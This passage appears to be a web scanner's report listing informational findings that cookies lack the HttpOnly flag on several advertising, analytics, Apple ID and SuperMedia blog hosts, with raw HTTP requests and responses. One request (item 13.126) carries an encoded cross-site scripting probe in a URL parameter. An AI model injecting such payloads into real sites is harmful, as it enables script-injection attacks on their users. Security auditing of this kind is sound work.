Set-Cookie: uniques=110203|626_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: psh=626_1296767254411; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203|32_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:34 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7224


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="preroll-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5945246</AdTitle>
<Impression>
<
...[SNIP]...

13.126. http://app.scanscout.com/ssframework/adStreamJSController.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://app.scanscout.com
Path:   /ssframework/adStreamJSController.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/adStreamJSController.xml?a=getadscheduleforcontent&format=vast&fetchads=overlay&ss_partnerId=626&ss_height=360&ss_width=480&asVersion=3&jsa=Y&blacklist=&ss_mediaCategories=&ss_mediaDescription=&ss_mediaId=v18978294NGnK88j8&ss_mediaKeywords=&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: app.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; behavioralSegments=29_110203|32_110203|263_110203

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:03 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: osh=626_1296767643681; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: behavioralSegments=29_110203_2|32_110203_2|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:03 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 697


<?xml version="1.0" encoding="UTF-8"?>
<VideoAdServingTemplate>
<Ad id="overlay-1">
<InLine>
<AdSystem>scanscout</AdSystem>
<AdTitle>5933179</AdTitle>
<NonLinearAds>

...[SNIP]...

13.127. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://appleid.apple.com
Path:   /cgi-bin/WebObjects/MyAppleId.woa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1
Host: appleid.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:04:29 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7l
set-cookie: ISTLocale=ZW5fVVM%3D; version=1; expires=Fri, 03-Feb-2012 18:04:29 GMT; path=/
connection: close
content-length: 24701
MS-Author-Via: DAV
Content-Type: text/html; charset=UTF-8;

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...

13.128. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p59844736&PRAd=60056&AR_C=656 HTTP/1.1
Host: ar.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Feb 2011 22:03:49 GMT
Content-Type: application/x-javascript
Connection: close
Vary: Accept-Encoding
Set-Cookie: ar_p59844736=exp=1&initExp=Thu Feb 3 22:03:49 2011&recExp=Thu Feb 3 22:03:49 2011&prad=60056&arc=656&; expires=Wed 04-May-2011 22:03:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296770629; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

13.129. http://audience.visiblemeasures.com/u/getuid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://audience.visiblemeasures.com
Path:   /u/getuid/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u/getuid/ HTTP/1.1
Host: audience.visiblemeasures.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056; sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:50 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 22:03:50 GMT
Set-Cookie: sid=C5F474F2682AA8DAE8075A6889492B4928B445B7;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 22:33:50 GMT
Content-Type: text/plain
Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)
Connection: close

u=9127E54769D9F368FC8156526FB88F6559521056&s=C5F474F2682AA8DAE8075A6889492B4928B445B7&n=1

13.130. http://audience.visiblemeasures.com/u/getuid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://audience.visiblemeasures.com
Path:   /u/getuid/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u/getuid/?nocache=0%2E6689167399890721&a=715b8c3a075d11dea9710019b9f1584b HTTP/1.1
Host: audience.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:08:03 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV"
Set-Cookie: uid=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Fri, 03-Feb-2012 21:08:03 GMT
Set-Cookie: sid_715B8C3A075D11DEA9710019B9F1584B=9127E54769D9F368FC8156526FB88F6559521056;Path=/;Domain=.visiblemeasures.com;Expires=Thu, 03-Feb-2011 21:38:03 GMT
Content-Type: text/plain
Content-Length: 89
Server: Jetty(7.x.y-SNAPSHOT)

u=9127E54769D9F368FC8156526FB88F6559521056&s=9127E54769D9F368FC8156526FB88F6559521056&n=1

13.131. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6036036&rn=439947884&c7=http%3A%2F%2Fcore.videoegg.com%2Feap%2F12368%2Fhtml%2Fjstags.html%3FCCID%3D0%26r%3D0.3821160274092108&c3=1&c9=http%3A%2F%2Fwww.tucows.com%2Fvideoegg%2Fad.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 20:51:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.132. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035784&c3=0&c4=2331.7717.9237.23663&c5=4871&c6=f978e9b0-271c-47b8-9a97-caba692f0bb2&c10=11073.35211.76599&c15=&cj=1&rn=5575236558291927040 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 03 Feb 2011 21:59:56 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sat, 02-Feb-2013 21:59:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.133. http://blog.supermedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:38 GMT
Server: Unspecified
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:38 GMT;path=/
Cache-Control: private
Content-Length: 30628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml"
...[SNIP]...

13.134. http://blog.supermedia.com/2011/01/2011-changes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/2011-changes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/2011-changes/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Changes to Look for in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternat
...[SNIP]...

13.135. http://blog.supermedia.com/2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/allowing-employees-to-work-from-home-could-be-a-win-win-for-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:26 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:26 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title> Allowing Employees to Work Remotely Could be a Win-Win for Your Business | SuperMedia Blog |
...[SNIP]...

13.136. http://blog.supermedia.com/2011/01/getting-in-shape-tips/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/getting-in-shape-tips/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/getting-in-shape-tips/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:18 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:18 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>3 Tips For Getting in Shape While Running a Business | SuperMedia Blog | SuperMedia.com</titl
...[SNIP]...

13.137. http://blog.supermedia.com/2011/01/how-to-use-op-ed-pages-to-promote-your-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/how-to-use-op-ed-pages-to-promote-your-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/how-to-use-op-ed-pages-to-promote-your-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:16 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:16 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How to Use Op-Ed Pages to Promote Your Business | SuperMedia Blog | SuperMedia.com</title>

...[SNIP]...

13.138. http://blog.supermedia.com/2011/01/starting-a-social-enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/starting-a-social-enterprise/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/starting-a-social-enterprise/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:28 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:28 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Starting A Social Enterprise | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...

13.139. http://blog.supermedia.com/2011/01/videos-will-help-your-small-business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/01/videos-will-help-your-small-business/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/videos-will-help-your-small-business/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:17 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:17 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>How Videos Will Help Your Small Business | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...

13.140. http://blog.supermedia.com/2011/02/build-brand/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/build-brand/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/build-brand/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Upping Your Brand in 2011 | SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate"
...[SNIP]...

13.141. http://blog.supermedia.com/2011/02/go-marketing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/go-marketing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/go-marketing/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Go Guerrilla with Your Marketing | SuperMedia Blog | SuperMedia.com</title>

<link rel="alt
...[SNIP]...

13.142. http://blog.supermedia.com/2011/02/planning-appreciation-events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/planning-appreciation-events/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/planning-appreciation-events/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Planning Appreciation Events | SuperMedia Blog | SuperMedia.com</title>

<link rel="alterna
...[SNIP]...

13.143. http://blog.supermedia.com/2011/02/should-you-loan-money-to-employees/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /2011/02/should-you-loan-money-to-employees/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/02/should-you-loan-money-to-employees/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:47:15 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:15 GMT;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Should You Loan Money to Your Employees? | SuperMedia Blog | SuperMedia.com</title>

<link
...[SNIP]...

13.144. http://blog.supermedia.com/archives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.supermedia.com
Path:   /archives/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
